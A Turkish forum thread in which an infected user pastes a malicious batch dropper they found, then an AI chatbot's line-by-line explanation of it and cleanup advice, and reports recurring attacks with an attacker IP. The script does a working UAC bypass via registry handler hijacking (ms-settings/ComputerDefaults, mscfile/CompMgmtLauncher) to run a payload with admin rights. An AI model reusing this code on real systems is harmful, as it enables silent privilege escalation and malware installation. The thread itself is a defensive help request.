Merhaba. Şu anda temiz kurulum yapamayacağım maalesef belki başka belirtiler görürsem temiz kurulum yaparım. Windows defenderdan çevrimdışı tarama yaptırdım bir de şimdi tam tarama yapıyorum.
Merhaba. Haklısınız indirmemem gerekirdi fakat bu şekilde bana yardımcı olmuyorsunuz.
Güncelleme: İki virüs dosyası buldum b.bat GPT-4O'dan detaylı bilgi istedim: Elbette! Kodu detaylı olarak inceleyelim:
### Kodun analizi.
"Batch
@Echo off.
Set PAYLOAD=C:\Users\Public\Pictures\Service.exe
Net session >nul 2>&1 || goto: Label.
%Payload%
Exit /b 2
Label.
Whoami /groups|findstr /i "\<S-1-5-32-544\>" >nul 2>&1
İf errorlevel 1 exit /b 1
For /f "tokens = 4-5 delims=. " %%i in ('ver') do set wın_ver=%%i.%%j
Set key="HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System"
For /f "skip = 2 tokens = 3" %%u in ('reg query %key% /v consentpromptbehavioradmin') do set /a "UAC=%%u"
İf %uac% equ 2 exit /b 1
İf %uac% equ 5 (
For %%v in (6.1 6.2 6.3) do if "%wın_ver%" == "%%v" call: Exploit mscfile CompMgmtLauncher.exe %payload%
İf "%wın_ver%" == "10.0" call: Exploit ms-settings ComputerDefaults.exe %payload%
)>Nul 2>&1
İf %uac% equ 0 PowerShell -c start-process "%payload%" -verb runas.
Exit /b 0
Exploit <key> <trigger> <payload>
Set regPath="HKCU\Software\Classes\%1\shell\open\command"
Reg add %regpath% /d "%~3" /f
Reg add %regpath% /v delegateexecute /f
%~2
Reg delete "HKCU\Software\Classes\%1" /f
Exit /b
"
### Kodu açıklama:
1. başlangıç ve payload tanımlama:
"Batch
@Echo off.
Set PAYLOAD=C:\Users\Public\Pictures\Service.exe
"
- '@Echo off': Ekranda komutların gösterilmesini engeller.
- 'Set payload=...': Zararlı yazılımın yeri burada tanımlanıyor. `Service.exe' olarak belirtilmiş.
2. yönetici yetkilerini kontrol etme:
"Batch
Net session >nul 2>&1 || goto: Label.
%Payload%
Exit /b 2
"
- 'Net session >nul 2>&1': Eğer komut çalışmazsa (yani kullanıcı yönetici değilse), ':label' etikete atlar.
- '%Payload%': Eğer yöneticiyseniz, `Service.exe' çalıştırılır.
- 'Exit /b 2': Komut bitirildikten sonra çıkış kodu 2 ile çıkılır.
3. yönetici grubuna üyeliği kontrol etme:
"Batch
:Label
Whoami /groups|findstr /i "\<S-1-5-32-544\>" >nul 2>&1
İf errorlevel 1 exit /b 1
"
- 'Whoami /groups': Kullanıcının grup üyeliklerini listeler.
- 'Findstr /i "\<S-1-5-32-544\>"': Kullanıcının 'administrators' grubuna üye olup olmadığını kontrol eder.
- Eğer kullanıcı yönetici değilse, 'exit /b 1' ile çıkılır.
4. windows versiyonunu kontrol etme:
"Batch
For /f "tokens = 4-5 delims=. " %%i in ('ver') do set wın_ver=%%i.%%j
"
- 'Ver' komutuyla Windows versiyonu alınır ve 'wın_ver' değişkenine atanır.
5. uac ayarlarını kontrol etme:
"Batch
Set key="HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System"
For /f "skip = 2 tokens = 3" %%u in ('reg query %key% /v consentpromptbehavioradmin') do set /a "UAC=%%u"
"
- 'Reg query' komutuyla UAC ayarları kontrol edilir.
- 'Consentpromptbehavioradmin' anahtarının değerini alır ve 'UAC' değişkenine atar.
6. uac durumuna göre çalıştırma:
"Batch
İf %uac% equ 2 exit /b 1
İf %uac% equ 5 (
For %%v in (6.1 6.2 6.3) do if "%wın_ver%" == "%%v" call: Exploit mscfile CompMgmtLauncher.exe %payload%
İf "%wın_ver%" == "10.0" call: Exploit ms-settings ComputerDefaults.exe %payload%
)>Nul 2>&1
İf %uac% equ 0 PowerShell -c start-process "%payload%" -verb runas.
"
- 'İf %uac% equ 2 exit /b 1': Eğer UAC ayarı 2 ise, çıkılır.
- 'İf %uac% equ 5': Eğer UAC ayarı 5 ise, belirli Windows sürümlerine göre ':exploit' etiketi ile payload çalıştırılır.
- 'İf %uac% equ 0 PowerShell -c start-process "%payload%" -verb runas': UAC ayarı 0 ise, 'PowerShell' kullanılarak 'payload' yönetici haklarıyla başlatılır.
7. kayıt defterini manipüle etme:
"Batch
:Exploit <key> <trigger> <payload>
Set regPath="HKCU\Software\Classes\%1\shell\open\command"
Reg add %regpath% /d "%~3" /f
Reg add %regpath% /v delegateexecute /f
%~2
Reg delete "HKCU\Software\Classes\%1" /f
Exit /b
"
- 'Reg add %regpath% /d "%~3" /f': Kayıt defterine zararlı komutu ekler.
- 'Reg add %regpath% /v delegateexecute /f': 'delegateexecute' anahtarını da ekler.
- '%~2': Trigger (tetikleyici) komutunu çalıştırır.
- 'Reg delete "HKCU\Software\Classes\%1" /f': Zararlı kayıtları siler.
### Özet ve öneriler.
Bu betik dosyası, kötü amaçlı bir yazılımı yönetici haklarıyla çalıştırmak için çeşitli yöntemler kullanır:
- Yönetici izinlerini kontrol eder.
- Uac ayarlarını kontrol eder ve uygun durumlarda sistemdeki kayıt defterini manipüle eder.
- Payload'u (Service.exe) çalıştırmak için çeşitli yollar dener.
Yapmanız gerekenler:
1. zararlı dosyayı silin: `Service.exe' dosyasını
C:\Users\Public\Pictures\ yolundan tamamen silin.2. kayıt defteri temizliği: 'Regedit' üzerinden zararlı kayıtları (örneğin
HKCU\Software\Classes\%1\shell\open\command) silin.3. tam sistem taraması: antivirüs yazılımı ile tam tarama yaparak diğer olası zararlı yazılımları tespit edin ve temizleyin.
4. başlangıç programlarını kontrol edin: Görev Yöneticisi'nden şüpheli başlangıç öğelerini devre dışı bırakın.
5. güvenlik güncellemeleri: Windows ve diğer yazılımları güncel tutun.
Bu adımlar, sisteminizi bu tür kötü amaçlı yazılımlardan temizlemenize ve gelecekte benzer sorunlardan korunmanıza yardımcı olacaktır.
Dedi. Fakat command reg kaydında OneDrive ile ilgili bir kod buldum.
norton aboneliğim var tarattım bir iki virüs temizledi fakat 10 dakikada bir falan bir saldırı gerçekleşiyor ve bu orjinal explorer.exe tarafından. saldıranın ip si: 164.92.232.138
explorer exe bilgisayarın kendi dosyası olduğu için silmekten korkuyorum ama virüs bunun içerisinde. ne yapmalıyım format haricinde?
Son düzenleme:
